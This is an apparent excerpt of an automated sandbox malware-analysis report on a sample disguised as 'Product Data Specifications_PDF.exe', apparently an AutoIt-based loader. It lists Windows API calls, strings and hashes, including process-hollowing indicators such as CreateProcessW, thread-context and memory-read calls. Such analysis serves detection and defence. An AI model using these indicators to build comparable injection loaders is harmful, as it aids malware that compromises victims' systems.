                              • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                              • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorLast
                              • String ID: NULL Pointer assignment$Not an Object type
                              • API String ID: 2487901850-572801152
                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                              APIs
                                • Part of subcall function 04004B30: Sleep.KERNELBASE(000001F4), ref: 04004B41
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04004DA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: GQTXFNCXMEJFZ8XD7
                              • API String ID: 2694422964-2635057786
                              • Opcode ID: 29a1819a0eab1f4d0f5d5b4c89f2ee1b4d2d3945b58be160dd30b51a8b75350f
                              • Instruction ID: a873e1ce7b98019ce12313b02f48991f20144e5284b843478aa5e012f5aabe41
                              • Opcode Fuzzy Hash: 29a1819a0eab1f4d0f5d5b4c89f2ee1b4d2d3945b58be160dd30b51a8b75350f
                              • Instruction Fuzzy Hash: 07619631D04248DBEF10DBA4C854BEEBB75EF59304F008199E608BB2C0D7BA5B45CB6A
                              APIs
                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcsncpy.LIBCMT ref: 00401C41
                              • _wcscpy.LIBCMT ref: 00401C5D
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                              • String ID: Line:
                              • API String ID: 1874344091-1585850449
                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$OpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 1607946009-824357125
                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040042EB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04004381
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040043A3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                              • Instruction ID: aba3eb301d6a8c860a69e37fa4bd19397d3ff64558e2c1d5a5f5cf7ee299a17c
                              • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                              • Instruction Fuzzy Hash: D162EB30A14258DBEB24DFA4C850BDEB376EF58304F1091A9D20DEB2D4E7759E81CB5A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                              • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0047950F
                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                              • VariantClear.OLEAUT32(?), ref: 00479650
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                              APIs
                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                              • _free.LIBCMT ref: 004295A0
                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3938964917-2594136341
                              • Opcode ID: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                              • Opcode Fuzzy Hash: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: Error:
                              • API String ID: 4104443479-232661952
                              • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                              • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                              APIs
                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                              • String ID: X$pWH
                              • API String ID: 85490731-941433119
                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                              APIs
                              • _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 00401B57
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                              • String ID: @EXITCODE
                              • API String ID: 2734553683-3436989551
                              • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                              • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                              Strings
                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 00410107
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _strcat
                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 1765576173-1088594522
                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 1794320848-0
                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$CurrentTerminate
                              • String ID:
                              • API String ID: 2429186680-0
                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                              APIs
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconNotifyShell_
                              • String ID:
                              • API String ID: 1144537725-0
                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                              APIs
